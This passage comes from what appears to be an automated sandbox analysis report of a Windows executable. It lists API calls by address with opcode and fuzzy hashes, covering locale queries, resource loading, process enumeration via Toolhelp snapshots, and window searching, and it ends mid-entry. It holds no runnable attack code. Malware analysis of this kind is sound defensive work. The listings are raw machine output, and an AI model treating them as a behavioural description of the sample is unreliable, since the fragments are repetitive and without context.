                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                                                                        • Instruction ID: 11a4c6921ebe278047dcd8f13468105319aefaf55964cb1d796cf0fb5e4db3cb
                                                                                                        • Opcode Fuzzy Hash: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                                                                        • Instruction Fuzzy Hash: 72D1C735B0010AEFCF10EF94C4919EDBBB5EF4D710F55A4AAE840A7311D638AE46CB69
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0002E100,00000000,00000000,00000004), ref: 0042E207
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,Function_0002E100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                                                                        • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                        • String ID:
                                                                                                        • API String ID: 4102113445-0
                                                                                                        • Opcode ID: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                                                                        • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                                                                        • Opcode Fuzzy Hash: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                                                                        • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000D100,00000000,00000000,00000004), ref: 0042E207
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000D100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                                                                        • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                        • String ID:
                                                                                                        • API String ID: 4102113445-0
                                                                                                        • Opcode ID: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                                                                        • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                                                                        • Opcode Fuzzy Hash: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                                                                        • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                        • Opcode ID: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                                                                        • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                                                                        • Opcode Fuzzy Hash: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                                                                        • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                        • Opcode ID: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                                                                        • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                                                                        • Opcode Fuzzy Hash: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                                                                        • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                                                                        APIs
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 004E72B0
                                                                                                        • GetClassNameW.USER32(?,?,00000200), ref: 004E732F
                                                                                                        • GetWindowTextW.USER32(?,?,00000200), ref: 004E7396
                                                                                                          • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                                                                          • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                                                                          • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocWindow$ClassFreeNameProcessTextThread
                                                                                                        • String ID: qN
                                                                                                        • API String ID: 1689834521-1131524284
                                                                                                        • Opcode ID: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                                                                        • Instruction ID: 384b602530dd3e7abee933e9cb9e54516736a920c6d3bdd50a0cb6d10c4ed17f
                                                                                                        • Opcode Fuzzy Hash: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                                                                        • Instruction Fuzzy Hash: E3415F74A0421D9FCB60EF59C885ED9B3B4EB48304F5085AAE808D7351DB34AE85CF95
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00024A8C), ref: 00424B33
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                                                                        • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00003A8C), ref: 00424B33
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                                                                        • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                        • Opcode ID: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                                                                        • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                                                                        • Opcode Fuzzy Hash: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                                                                        • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                        • Opcode ID: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                                                                        • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                                                                        • Opcode Fuzzy Hash: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                                                                        • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                                                                        APIs
                                                                                                        • FindWindowA.USER32(00000000,?), ref: 004E6F81
                                                                                                          • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E6F32
                                                                                                          • Part of subcall function 004CF608: Process32Next.KERNEL32(00000000,?), ref: 004CF619
                                                                                                        • EnumWindows.USER32(004E6C44,?), ref: 004E70AC
                                                                                                          • Part of subcall function 004CF5E8: Process32First.KERNEL32(00000000,00000128), ref: 004CF5F9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E709E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcess32$CreateEnumFindFirstNextSnapshotToolhelp32WindowWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 180456925-0
                                                                                                        • Opcode ID: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                                                                        • Instruction ID: 72b661b911529101ae542200eb1df53ac65a5c9b4dd6d11e1212abbbfab87a01
                                                                                                        • Opcode Fuzzy Hash: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                                                                        • Instruction Fuzzy Hash: A9A1B2347003598BCB21EF5AD881BEFB3B6EF54359F5045AAE80497345DB3CEE458A88
                                                                                                        APIs
                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00431F63
                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00431F7F
                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00431FF6
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0043201F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 920484758-0
                                                                                                        • Opcode ID: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                                                                        • Instruction ID: f3952d494a17d4f816fc107e6549c8048cd253aa9e54a2e5d839202b9fdd8af3
                                                                                                        • Opcode Fuzzy Hash: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                                                                        • Instruction Fuzzy Hash: 45411E75A0021D9FCB61DB59CC91BC9B3BCAF4C314F0051DAE549A7222DB38AF858F58
                                                                                                        APIs
                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                        • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3990497365-0
                                                                                                        • Opcode ID: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                                                                        • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                                                                        • Opcode Fuzzy Hash: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                                                                        • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                                                                        APIs
                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                        • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3990497365-0
                                                                                                        • Opcode ID: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                                                                        • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                                                                        • Opcode Fuzzy Hash: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                                                                        • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                                                                        APIs
                                                                                                        • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                                                                        • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                                                                          • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocaleStringThreadType
                                                                                                        • String ID:
                                                                                                        • API String ID: 1505017576-0
                                                                                                        • Opcode ID: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                                                                        • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                                                                        • Opcode Fuzzy Hash: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                                                                        • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                                                                        APIs
                                                                                                        • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                                                                        • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                                                                          • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocaleStringThreadType
                                                                                                        • String ID:
                                                                                                        • API String ID: 1505017576-0
                                                                                                        • Opcode ID: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                                                                        • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                                                                        • Opcode Fuzzy Hash: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                                                                        • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0043E8A3
                                                                                                        • LoadResource.KERNEL32(?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8BD
                                                                                                        • SizeofResource.KERNEL32(?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8D7
                                                                                                        • LockResource.KERNEL32(0043E5F4,00000000,?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 3473537107-0
                                                                                                        • Opcode ID: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                                                                        • Instruction ID: 1ca1a7a9c485ca756b6cf2f32b2eaf6a8b809140a0052c2abd4bb8ac9ed98deb
                                                                                                        • Opcode Fuzzy Hash: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                                                                        • Instruction Fuzzy Hash: C8F06DB2606614AF5708EEAEA881D5B77DCDE88364720016FF918C7246DA39DD0183BC
                                                                                                        APIs
                                                                                                        • GlobalHandle.KERNEL32 ref: 00428CD3
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167344118-0
                                                                                                        • Opcode ID: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                                                                        • Instruction ID: d653ff63ed22f6af050254ba5540b1362e96b0375665dbbf2afb4746ab74a42f
                                                                                                        • Opcode Fuzzy Hash: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                                                                        • Instruction Fuzzy Hash: 44B002D4B922307DB90433B6EC0BD3F115C9D947097C44A5E7500D2086DC7D9C22407D
                                                                                                        APIs
                                                                                                        • GlobalHandle.KERNEL32 ref: 00428CD3
